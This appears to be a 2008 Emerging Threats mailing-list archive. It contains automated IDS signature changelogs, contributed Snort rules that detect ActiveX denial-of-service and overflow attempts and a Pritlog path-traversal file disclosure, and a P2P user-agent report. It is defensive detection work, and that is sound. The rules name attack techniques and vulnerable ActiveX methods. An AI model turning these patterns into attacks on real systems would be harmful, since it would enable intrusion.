    2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
    2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
    2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
    2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
    2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
    2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
    2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
    2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
    2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
    2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
    2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
    2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
    2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
    2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
    2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules)
    2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules)
    2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules)
    2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules)
    2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules)
    2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules)
    2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules)
    2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules)
    2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules)
    2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules)
    2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules)
    2407011 - ET RBN Known Russian Business Network Monitored Domains -
    BLOCKING (12) (emerging-rbn-BLOCK.rules)
    2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules)
    2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules)
    2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules)
    2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules)
    2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules)
    2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules)
    2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules)
    2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules)
    2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules)

[---] Removed rules: [---]

    2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
    2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-drop-BLOCK.rules (2):

    # VERSION 1316
    # Generated 2008-10-04 00:03:02 EDT

-> Added to emerging-drop.rules (2):

    # VERSION 1316
    # Generated 2008-10-04 00:03:02 EDT

-> Added to emerging-exploit.rules (3):

    #by Stillsecure
    #by Stillsecure
    #by Stillsecure

-> Added to emerging-p2p.rules (1):

    #christopher Campesi

-> Added to emerging-rbn-BLOCK.rules (2):

    # VERSION 77
    # Updated 2008-10-01 18:23:28

-> Added to emerging-rbn.rules (2):

    # VERSION 77
    # Updated 2008-10-01 18:23:28

-> Added to emerging-sid-msg.map (43):

    2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking in with Controller
    2008493 || ET TROJAN Pushdo Checkin
    2008593 || ET TROJAN Ultimate Defender Fake AV Checkin
    2008594 || ET MALWARE ezday.co.kr Related Spyware User-Agent Detected (Ezshop)
    2008595 || ET P2P SoulSeek P2P Server Connection || url,www.slsknet.org
    2008596 || ET SCAN Brute Force Exploit Detector HTTP Buffer Overflow Detection || url,www.snake-basket.de/bed.html
    2008597 || ET SCAN Cisco Torch SNMP Scan || url,www.securiteam.com/tools/5EP0F1FEUA.html || url,www.hackingexposedcisco.com/?link=tools
    2008598 || ET SCAN Sipsak SIP scan || url,sipsak.org/
    2008599 || ET CURRENT_EVENTS Asprox Cookie SQL Injection Attempt || url,isc.sans.org/diary.html?n&storyid=5092
    2008600 || ET MALWARE Suspicious User-Agent Detected (Windows+NT)
    2008601 || ET TROJAN Visual Shock Keylogger Reporting to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573
    2008602 || ET TROJAN Visual Shock Keylogger Reporting Idle to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573
    2008603 || ET MALWARE Suspicious User-Agent Detected (RLMultySocket)
    2008604 || ET TROJAN Gamethief/PSW.Magania Checkin
    2008605 || ET SCAN Stompy Web Application Session Scan || url,www.darknet.org.uk/2007/03/stompy-the-web-application-session-analyzer-tool/
    2008606 || ET SCAN Enumiax Inter-Asterisk Exchange Protocol Username Scan || url,sourceforge.net/projects/enumiax/
    2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600
    2008608 || ET MALWARE WinFixer Trojan Related User-Agent Detected (ElectroSun NetInstaller)
    2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html
    2008610 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Components Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html
    2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org
    2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html
    2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/
    2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/
    2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/
    2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/
    2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm
    2406021 || ET RBN Known Russian Business Network Monitored Domains (22) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406022 || ET RBN Known Russian Business Network Monitored Domains (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406023 || ET RBN Known Russian Business Network Monitored Domains (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406024 || ET RBN Known Russian Business Network Monitored Domains (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406025 || ET RBN Known Russian Business Network Monitored Domains (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406026 || ET RBN Known Russian Business Network Monitored Domains (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406027 || ET RBN Known Russian Business Network Monitored Domains (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2406028 || ET RBN Known Russian Business Network Monitored Domains (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407021 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) ||
    url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407022 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407023 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407024 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407025 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407026 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407027 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    2407028 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork

-> Added to emerging-sid-msg.map.txt (43): (the same 43 entries as emerging-sid-msg.map above)

-> Added to emerging-virus.rules (1):

    # ref: 4e224c80f62c1b3dc74d295d0633e699

-> Added to emerging-web_sql_injection.rules (3):

    #by Stillsecure
    #by Stillsecure
    #by Stillsecure

-> Added to emerging.rules (1):

    #matt jonkman

[---] Removed non-rule lines: [---]

-> Removed from emerging-drop-BLOCK.rules (2):

    # VERSION 1309
    # Generated 2008-09-27 00:03:02 EDT

-> Removed from emerging-drop.rules (2):

    # VERSION 1309
    # Generated 2008-09-27 00:03:02 EDT

-> Removed from emerging-rbn-BLOCK.rules (2):

    # VERSION 63
    # Updated 2008-09-25 09:04:53

-> Removed from emerging-rbn.rules (2):

    # VERSION 63
    # Updated 2008-09-25 09:04:53

-> Removed from emerging-sid-msg.map (14):

    2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking with Controller
    2008493 || ET TROJAN Cutwail/W32.Small.avu Dropper
    2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
    2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
    2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
    2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (14): (the same 14 entries as emerging-sid-msg.map above)

From jonkman at jonkmans.com Sat Oct 4 21:25:18 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Sat, 04 Oct 2008 21:25:18 -0400
Subject: [Emerging-Sigs] StillSecure: Signatures - 3rd Oct-08
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com>
Message-ID: <48E8177E.60009@jonkmans.com>

Added, sorry for the delay.

signatures wrote:
> Hi Matt
>
> Please find 5 New Signatures below:
>
> 1. IAS Helper COM Component iashlpr.dll activex remote DOS
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"IAS Helper COM Component iashlpr.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D"; distance:0; nocase; content:"PutProperty"; nocase; classtype:web-application-attack; reference:url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded; reference:cve,2008-2639; reference:url,securityreason.com/securityalert/4323; sid:8413; rev:1;)
>
> 2. Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"; distance:0; nocase; content:"CanUninstall"; nocase; classtype:web-application-attack; reference:bugtraq,31435; reference:url,securitytracker.com/alerts/2008/Sep/1020951.html; sid:8414; rev:1;)
>
> 3. Internet Information Service iisext.dll activex setpassword Insecure Method
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service iisext.dll activex setpassword Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"C3B32488-AFEC-11D1-9868-00A0C922E703"; distance:0; nocase; content:"SetPassword"; nocase; classtype:web-application-attack; reference:cve,2008-4301; reference:url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded; sid:8415; rev:1;)
>
> 4. Internet Information Service adsiis.dll activex remote DOS
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service adsiis.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"D6BFA35E-89F2-11D0-8527-00C04FD8D503"; distance:0; nocase; content:"GetObject"; nocase; classtype:web-application-attack; reference:cve,2008-4300; reference:url,securityreason.com/securityalert/4325; sid:8416; rev:1;)
>
> 5. Pritlog index.php filename File Disclosure
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Pritlog index.php filename File Disclosure"; flow:established,to_server; content:"GET"; uricontent:"/index.php?option=viewEntry"; nocase; uricontent:"&filename="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,secunia.com/Advisories/31969/; reference:url,www.milw0rm.com/exploits/6613; sid:8417; rev:1;)
>
> Looking forward for your comments if any...
>
> Thanks & Regards,
> StillSecure
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Sat Oct 4 21:26:22 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Sat, 04 Oct 2008 21:26:22 -0400
Subject: [Emerging-Sigs] Thanks
Message-ID: <48E817BE.8040609@jonkmans.com>

Just wanted to say a big thanks to two big sig contributors this week. Stillsecure.com for a range of goodies. And Kevin Ross for the slew of VOIP sigs.

All are very appreciated guys!!
Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From dxp2532 at gmail.com Sat Oct 4 23:11:29 2008
From: dxp2532 at gmail.com (dxp)
Date: Sat, 04 Oct 2008 23:11:29 -0400
Subject: [Emerging-Sigs] P2P Software - Pando
Message-ID: <1223176289.7169.6.camel@kinta>

Saw this recently on the wire, belongs to yet another P2P application called Pando (www.pando.com/what).

User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9

- 
-=[ dxp ]=-
0xA3F3C6E3

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081004/aa1b0edb/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081004/aa1b0edb/attachment.bin

From jonkman at jonkmans.com Sun Oct 5 10:31:01 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Sun, 05 Oct 2008 10:31:01 -0400
Subject: [Emerging-Sigs] P2P Software - Pando
In-Reply-To: <1223176289.7169.6.camel@kinta>
References: <1223176289.7169.6.camel@kinta>
Message-ID: <48E8CFA5.9020305@jonkmans.com>

Assuming this is on port 80 primarily, or on high ports?

Thanks dxp!

Matt

dxp wrote:
> Saw this recently on the wire, belongs to yet another P2P application
> called Pando (www.pando.com/what).
> User-Agent: Mozilla/4.0 (Windows; U) Pando/1.9.5.9
>
> - 
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Sun Oct 5 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 5 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081005200008.EA4BC45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sun Oct 5 16:00:08 2008 [***]

[+++] Added rules: [+++]

    2008618 - ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS (emerging-dos.rules)
    2008619 - ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow (emerging-exploit.rules)
    2008620 - ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method (emerging-exploit.rules)
    2008621 - ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS (emerging-exploit.rules)
    2008622 - ET WEB Pritlog index.php filename File Disclosure (emerging-web.rules)
    2008623 - ET TROJAN Cinmus.Checkin 1 (emerging-virus.rules)
    2008624 - ET TROJAN Cinmus.Checkin 2 (emerging-virus.rules)
    2008625 - ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx) (emerging-p2p.rules)
    2008626 - ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report (emerging-virus.rules)
    2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
    2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
    2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules)
    2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules)

[///] Modified active rules: [///]

    2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
    2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
    2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
    2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
    2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
    2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
    2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
    2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
    2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
    2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
    2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
    2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
    2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
    2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
    2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
    2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
    2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
    2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
    2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
    2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
    2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
    2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
    2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
    2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
    2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
    2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
    2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
    2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
    2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
    2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules)
    2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules)
    2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules)
    2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules)
    2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules)
    2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules)
    2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules)
    2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules)
    2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules)
    2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules)
    2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules)
    2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules)
    2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules)
    2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules)
    2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules)
    2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules)
    2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules)
    2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules)
    2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules)
    2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules)
    2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules)
    2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules)
    2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules)
    2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules)
    2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules)
    2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules)
    2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules)
    2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules)
    2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules)

[+++] Added non-rule lines: [+++]

    -> Added to emerging-dos.rules (1):
       #by Stillsecure (stillsecure.com)
    -> Added to emerging-exploit.rules (2):
       #by Stillsecure (stillsecure.com)
       #by Stillsecure (www.stillsecure.com)
    -> Added to emerging-p2p.rules (1):
       #by dxp
    -> Added to emerging-rbn-BLOCK.rules (2):
       # VERSION 78
       # Updated 2008-10-04 20:39:29
    -> Added to emerging-rbn.rules (2):
       # VERSION 78
       # Updated 2008-10-04 20:39:29
    -> Added to emerging-sid-msg.map (15):
       2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded
       2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435
       2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301
       2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300
       2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/
       2008623 || ET TROJAN Cinmus.Checkin 1
       2008624 || ET TROJAN Cinmus.Checkin 2
       2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx)
       2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report
       2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
       2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
       2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
       2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
       2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
       2407030 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
    -> Added to emerging-sid-msg.map.txt (15):
       2008618 || ET DOS IAS Helper COM Component iashlpr.dll activex remote DOS || url,securityreason.com/securityalert/4323 || cve,2008-2639 || url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded
       2008619 || ET EXPLOIT Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow || url,securitytracker.com/alerts/2008/Sep/1020951.html || bugtraq,31435
       2008620 || ET EXPLOIT Internet Information Service iisext.dll activex setpassword Insecure Method || url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded || cve,2008-4301
       2008621 || ET EXPLOIT Internet Information Service adsiis.dll activex remote DOS || url,securityreason.com/securityalert/4325 || cve,2008-4300
       2008622 || ET WEB Pritlog index.php filename File Disclosure || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/
       2008623 || ET TROJAN Cinmus.Checkin 1
       2008624 || ET TROJAN Cinmus.Checkin 2
       2008625 || ET P2P Pando Client User-Agent Detected (Mozilla/4.0 (Windows\; U) Pando/1.xx)
       2008626 || ET TROJAN PlayMP3z.biz Related Spyware/Trojan Install Report
       2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
       2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
       2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
       2406030 || ET RBN Known Russian Business Network Monitored Domains (31) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
       2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
